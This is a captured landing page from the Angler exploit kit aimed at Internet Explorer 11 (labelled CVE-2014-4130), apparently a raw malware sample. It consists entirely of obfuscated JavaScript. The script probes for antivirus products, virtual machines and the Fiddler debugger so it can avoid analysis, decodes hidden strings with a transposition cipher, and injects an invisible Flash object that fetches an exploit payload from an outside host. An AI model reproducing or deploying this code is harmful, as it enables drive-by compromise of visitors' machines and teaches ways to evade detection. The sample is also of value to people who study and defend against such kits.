AnglerEK_IE11_32bits_Landing_CVE-2014-4130

1.   function Target() { window['Abydki'] = true; akmNNvk = ''; window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false; }  function Ufe3S(txt) { var v1='LD'+'OM', v2 = 'pa'+'rseE'+'rr'+'or', v3 ='loa'+'dX'+'ML', v4 = 'DT'+'D X'+'HTML 1.0 Transitional', v5 = 'err'+'orC'+'ode'; v1 = 'XM'+v1; var resInf = new ActiveXObject("Microsoft."+v1), subpath= "c:\\Windows\\System32\\drivers\\"+txt+".sys"; resInf.async = true; resInf[v3]('<!DOCTYPE html PUBLIC "-//W3C//'+v4+'//EN" "res://' + subpath + '">'); if (resInf[v2][v5] != 0) { var cind ="-21"+"47023083"; var tst = " ", pe=resInf[v2]; tst += pe[v5] + "\n"+pe.reason+pe.line; if (tst.indexOf(cind) > 0) { return 1; }  else { return 0; } }  return 0; }  var tmp; try{ tmp = new ActiveXObject('Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1'); }catch(e){ tmp = false; }  if (tmp || Ufe3S("kl1") || Ufe3S("tmactmon") || Ufe3S("tmcomm") || Ufe3S("tmevtmgr") || Ufe3S("TMEBC32") || Ufe3S("tmeext") || Ufe3S("tmnciesc") || Ufe3S("tmtdi") || Ufe3S("vm3dmp") || Ufe3S("vmusbmouse") || Ufe3S("vmmouse") || Ufe3S("vmhgfs") || Ufe3S("VBoxGuest") || Ufe3S("VBoxMouse") || Ufe3S("VBoxSF") || Ufe3S("VBoxVideo") || Ufe3S("prl_boot") || Ufe3S("prl_fs") || Ufe3S("prl_kmdd") || Ufe3S("prl_memdev") || Ufe3S("prl_mouf") || Ufe3S("prl_pv32") || Ufe3S("prl_sound") || Ufe3S("prl_strg") || Ufe3S("prl_tg") || Ufe3S("prl_time") ){ Target(); } else { function Check(s){ x = document.createElement('script'); x.onload = Target; x.src = s; document.body.appendChild(x); return 0; }  var kv1 = "res://C:\\Program Files", kv2 = "\\Kaspersky Lab\\Kaspersky ", kv3 ="Anti-Virus ", kv4="Internet Security ", kv5="\\shellex.dll/#2/#102", kv6="\\mfc42.dll/#2/#26567", v1='VMware',v2='TPAutoConnSvc.exe', pathdata = [ kv1+kv2+kv3+'5.0 for Windows Workstations'+kv5, kv1+kv2+kv3+'6.0 for Windows Workstations'+kv5, kv1+kv2+kv3+'6.0'+kv5, kv1+kv2+kv3+'7.0'+kv5, kv1+kv2+kv3+'2009'+kv6, kv1+kv2+kv3+'2010'+kv6, kv1+kv2+kv3+'2011\\avzkrnl.dll/#2/BBALL', kv1+kv2+kv3+'2012\\x86'+kv6, kv1+kv2+kv3+'2013\\x86'+kv6, kv1+kv2+kv4+'6.0'+kv5, kv1+kv2+kv4+'7.0'+kv5, kv1+kv2+kv4+'2009'+kv6, kv1+kv2+kv4+'2010'+kv6, kv1+kv2+kv4+'2011\\avzkrnl.dll/#2/BBALL', kv1+kv2+kv4+'2012\\x86'+kv6, kv1+kv2+kv4+'2013\\x86'+kv6, kv1+kv2+kv4+'14.0.0\\x86'+kv6, kv1+kv2+kv4+'15.0.0\\x86'+kv6, kv1+kv2+'PURE'+kv6, kv1+kv2+'PURE 2.0\\x86'+kv6, kv1+kv2+'PURE 3.0\\x86'+kv6, kv1+' (x86)'+kv2+kv3+'2013\\x86'+kv6, kv1+' (x86)'+kv2+kv4+'2013\\x86'+kv6, kv1+' (x86)'+kv2+'PURE'+kv6, kv1+' (x86)'+kv2+'PURE 2.0\\x86'+kv6, kv1+' (x86)'+kv2+'PURE 3.0\\x86'+kv6, kv1+'\\Fiddler2\\Fiddler.exe/#3/#32512', kv1+' (x86)\\Fiddler2\\Fiddler.exe/#3/#32512', kv1+'\\'+v1+'\\'+v1+' Tools\\'+v2+'/#2/#26567', kv1+'\\'+v1+'\\'+v1+' Tools\\'+v2+'/#2/#30996', kv1+'\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110', kv1+'\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204', ]; for (var i = 0; i < pathdata.length; ++i)  Check(pathdata[i]); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); }  while(curDate-date < millis); }  pausecomp(1000); }              if (!Array.prototype.indexOf) { Array.prototype.indexOf = function(obj, start) { for (var i = (start || 0), j = this.length; i < j; i++) { if (this[i] === obj) { return i; } }  return -1; }; } window["BYPfZiYf"] = new Function ('text', "var cryptKey = NzoltMbu[ 0 ], rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray.push(rawArray.indexOf(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;"); window.sf325gtgs7sfdf1 = true; var xObjectName = 'ActiveXObject'; var xObject = window[xObjectName]; var Browser = { Version: function () { try { var birks = /malware.dontneedcoffee.com/.test(); } catch (e) {}  var version = 999; if (navigator.appVersion.indexOf("MSIE") != -1)  version = parseFloat(navigator.appVersion.split("MSIE")[1]); return version; } }; if (!window.sf325gtgs7sfdj && !window.sf325gtgs7sfdf1 && !window.sf325gtgs7sfdf2 && (Browser.Version() > 10)) { var urlName = BYPfZiYf(NzoltMbu[ 1 ]); document.location.href = "/" + urlName; }                    if (window.sf325gtgs7sfdf1 ) { var klfg1 = 'wri', klfg2 ='te'; function getKolaio() { return BYPfZiYf(NzoltMbu[ 2 ]); }  function getTxl(a) { return BYPfZiYf(NzoltMbu[ 3 ]); }  function getVariable(a) { return BYPfZiYf(NzoltMbu[ 4 ]); }  var mirtul = "1"; var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf">'; txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />'; txt = txt + '<param name="play" value="true"/>'; txt = txt + '<param name=FlashVars value="exec=' + getVariable(mirtul) + '" />'; txt = txt + '<!--[if !IE]>-->'; txt = txt + '<object type="application/x-shockwave-flash" data="http://' + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1">'; txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />'; txt = txt + '<param name="play" value="true"/>'; txt = txt + '<param name=FlashVars value="exec=' + getVariable(mirtul) + '" />'; txt = txt + '<!--<![endif]-->'; txt = txt + '<!--[if !IE]>--></object><!--<![endif]-->'; txt = txt + '</object>'; try{;}catch (e){}  document.getElementById("Gtr56Se").innerHTML = txt; }